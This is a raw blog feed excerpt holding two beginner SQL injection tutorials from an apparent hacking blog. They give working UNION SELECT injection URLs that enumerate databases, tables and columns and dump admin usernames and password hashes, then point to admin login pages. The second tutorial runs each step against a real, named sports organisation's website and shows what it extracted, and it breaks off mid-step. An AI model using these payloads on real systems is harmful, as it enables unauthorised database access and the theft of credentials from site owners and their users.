#333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Go here and type in your table name where is says "Say Hello to My Little Friend".&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;In my case, this is the string that I got after I inputted "admin" to the input space:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;61646d696e&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now, replace the table name with hex as so:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/main.php?id=-232" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/main.php?id=-232&lt;/a&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;The "0x3a" will put a colon to where the information will be separated. You should get something like this:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;1:MyName:e10adc3949ba59abbe56e057f20f883e&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now as you can see. This is the login info:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Username: MyName&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Pass: 123456&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now all you have to do is find the admin page, which is usually&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Code:&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/admin" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/admin&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/adminlogin" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/adminlogin&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/admin_login" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/admin_login&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.sitename.com/login" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.sitename.com/login&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;or something similar. There are tools online that will find you the admin page.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Any questions? PM me.&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-9093786057109473557?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/9093786057109473557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/sql-injection-tutorial-100-noob.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/9093786057109473557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/9093786057109473557'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/sql-injection-tutorial-100-noob.html' title='SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-3589687905346555662</id><published>2012-02-01T22:47:00.002+06:00</published><updated>2012-02-01T22:47:43.834+06:00</updated><title type='text'>MySQL Injection[FULL TUTORIAL]</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: red; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br class="Apple-interchange-newline" /&gt;MySQL Injectioin Tutorial&lt;br /&gt;Structure:&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: mediumblue; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div style="text-align: center;"&gt;1.Intro#&lt;br /&gt;&lt;br /&gt;2.What is SQL&lt;br /&gt;&lt;br /&gt;3.MySQL&lt;br /&gt;&lt;br /&gt;4.How to find vulnerability&lt;br /&gt;&lt;br /&gt;5.Exploiting Mysql vulnerability&lt;br /&gt;&lt;br /&gt;6.Getting Mysql Version&lt;br /&gt;&lt;br /&gt;7.Getting Mysql User&lt;br /&gt;&lt;br /&gt;8.Getting Mysql Databases&lt;br /&gt;&lt;br /&gt;9.Getting Mysql Tables&lt;br /&gt;&lt;br /&gt;10.Getting Mysql Columns&lt;br /&gt;&lt;br /&gt;11.Getting Information From Columns&lt;br /&gt;&lt;br /&gt;12.Finding Admin Panel&lt;br /&gt;&lt;br /&gt;13.Tools&lt;br /&gt;&lt;br /&gt;14.Greetz&lt;br /&gt;&lt;br /&gt;15.End#&lt;/div&gt;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;1. Intro#&lt;br /&gt;&lt;br /&gt;today am going to explain MySQL Injection on Live Example.What that means?-Well it means that i'll exploit an real site.This tutorial is for anykind level reader,student,newbie even noob.I just wonna to show you how easy is this prefor of Attack.So enough talking we have a lot of things to cover here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. What is SQL?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.&lt;br /&gt;In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents.&lt;br /&gt;&lt;br /&gt;3. MySQL&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MySQL is a relational database management system (RDBMS) that runs as a server providing multi-user access to a number of databases. It is named after developer Michael Widenius daughter, My. The SQL phrase stands for Structured Query Language.&lt;br /&gt;&lt;br /&gt;=So the basic what you need to know about SQL and MySQL are done now the real part begins&lt;br /&gt;&lt;br /&gt;4. How to find vulnerability&lt;br /&gt;&lt;br /&gt;There many many ways to find vulnerability.Most familiar ways are using the Google Dorks:&lt;br /&gt;&lt;br /&gt;inurl:index.php?id=&lt;br /&gt;inurl:article.php?id=&lt;br /&gt;allinurl:news.php?id=&lt;br /&gt;inurl:shop.php?cat=&lt;br /&gt;&lt;br /&gt;Hackers always say "Google is my Best Friend" now you know way without of google we couldn't do our job so easy.So at the end of this tutorial i'll post a dork list so am going to save you from searching the internet.&lt;br /&gt;&lt;br /&gt;5. Exploiting Mysql vulnerability&lt;br /&gt;&lt;br /&gt;So lets start with exploiting our target.For this tutorial i dicided to chose European Table Tennis Union&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I have used a dork inurl:news_view.php?id= and i got this link of the site&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So how can we test it is it vuln. on MySQL Injection? - Its simple with adding ' or % at the and or before the id.Now our vuln. link should look like this&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583'" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583'&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Did you notice something was changed?-Yes the content that was previos on the site was not showed.So this is a sing that this site may be vuln. on MySQL Injection sometimes will print you a message that says&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect&lt;br /&gt;&lt;br /&gt;In this case doesn't show so we also may be facing with MySQL NoError Injection.How can we know for sure is it vuln.?-We are going to start typeing&lt;br /&gt;&lt;br /&gt;ORDER BY 1 After the ID number&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So our content is shown agaen.And now we are sure we're facing a site that is vuln. on MySQLInjection.We continue to incrise the Order Number so we find out how many columns are there until we get an blan page agaen.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2&lt;/a&gt;&amp;nbsp;&amp;lt;== No blank Page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3&lt;/a&gt;&amp;nbsp;&amp;lt;== No blank Page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+4" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+4&lt;/a&gt;&amp;nbsp;&amp;lt;== No blank Page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10&lt;/a&gt;&amp;nbsp;&amp;lt;== No blank Page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+15" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+15&lt;/a&gt;&amp;nbsp;&amp;lt;== No blank Page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16&lt;/a&gt;&amp;nbsp;&amp;lt;== No blank Page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17&lt;/a&gt;&amp;nbsp;&amp;lt;== Blank Page&lt;br /&gt;&lt;br /&gt;wOOt!! We now know that there are 16 vuln. columns!!&lt;br /&gt;&lt;br /&gt;Now we are going to select them all with this comand UNION SELECT or UNION ALL SELECT&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=258...14,15,16--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Dont forget to put "--" at the end or it will return an blank page.So the content loads agaen and lets see witch of these vuln. columns we can use.To do that we add a '-' before the ID Number&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...14,15,16--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So this is very important if you dont do this you cannot continue to do the next several steps and now it prints us a vuln. columns number 2 and number 4.So this means that columns with number 2 and 4 are vulnruble and we can use them.To get Mysql version,User,Databases.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Getting Mysql Version&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To get MySQL version we use version() or @@version commands to dispaly version of MySQL Database.So we change 2 into @@version and&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,1%E2%80%8B6--" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=258...14,15,16--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;there is it MySQL Version displayet at the page.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;5.1.37-1ubuntu5.5&lt;br /&gt;&lt;br /&gt;So when MySQL Version is 5&amp;gt; we can use information_schema to get data faster but if version is &amp;gt;5 that means that we need to guess the tables and columns.So we need to be very lucky to guess the tabale and column.&lt;br /&gt;&lt;br /&gt;7. Getting Mysql User&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Getting the user is with the user() command&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...14,15,16--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Displayed&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;ettu_admin@localhost&lt;br /&gt;&lt;br /&gt;8. Getting Mysql Databases&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So now we need to get the databases with the followed command database()&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...14,15,16--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Displayed&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;ettu.org_ettu_db01&lt;br /&gt;&lt;br /&gt;Sometimes there are more databases so it good to know how many databases there are and why are they for.Becouse maybe the data we are looking is in the other database.&lt;br /&gt;&lt;br /&gt;9. Getting Mysql Tables&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And here we are at the main think.How to find out the table names.&lt;br /&gt;&lt;br /&gt;We are going to do this with adding this command&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;group_concat(table_name)&lt;br /&gt;&lt;br /&gt;at the place of the vun. column and in our case is 2 and with adding at the end of the number of columns the following command&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()&lt;br /&gt;&lt;br /&gt;What does this mean?-This means to select Table Names from information_schema where table schema is from the Database. and when we replace everything we get this link and this tables:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+%E2%80%8B" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...,14,15,16+&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--&lt;br /&gt;&lt;br /&gt;We got a lots of tables but we dont need them all so am going to press Ctrl+F [Find specific word] and type user,users,admin,members and it turns out that there is a table with the name&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;0910ettucup01_admin&lt;br /&gt;&lt;br /&gt;Now we know that there is table with name admin and there must be some username and passwords but to that we need to find the columns in that table!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10.Getting Mysql Columns&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We found out that theres a table admin and now we need to find the columns we need to change table_name to column_name and&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--&lt;br /&gt;&lt;br /&gt;to&lt;br /&gt;&lt;br /&gt;FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--&lt;br /&gt;&lt;br /&gt;Now when we change all that we get&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=-2583+UNION+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16%E2%80%8B+" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...,14,15,16+&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--&lt;br /&gt;&lt;br /&gt;with executing this we get a lot i mean really a lot of columns name that we dont need and it may take a while till we find our most needed columns so we are going to pull out only the columns from our table that we found earlier and that is from ettu.org_ettu_db01 to do this we need to you MySQL Char How to find it?-Well you can always use google or you can install on your mozila an addon with name HackBar there is a MySQL char converter so now am going to convert our table into a Mysql Char&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109, 105, 110)&lt;br /&gt;&lt;br /&gt;Now where to put this?-We are going to change our link into:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ettu.org/news_view.php?id=-2583+union+select+1,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,13,14,1%E2%80%8B5,16+" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...,14,15,16+&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;from+information_schema.columns+where+table_name=CHAR%2848,%2057,%2049,%2048,%20​101,%20116,%20116,&lt;br /&gt;&lt;br /&gt;%20117,%2099,%20117,%20112,%2048,%2049,%2095,%2097,%20100,%20109,%20105,%20110%2​9--&lt;br /&gt;&lt;br /&gt;Now are displayed the columns that are in Table 'ADMIN'&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;id,login,password,stato,id_squ,girone,abilitato&lt;br /&gt;&lt;br /&gt;Our work is almost done.Just to dump usernames and passwords.&lt;br /&gt;&lt;br /&gt;11.Getting Information From Columns&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To do this we are going to use a command that we are using it all the way till here.And that is group_concat().All we now need to do is to change column_name into our ectual column names and that are "login,password,id,stato ect" So lets see how ill it looks&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a 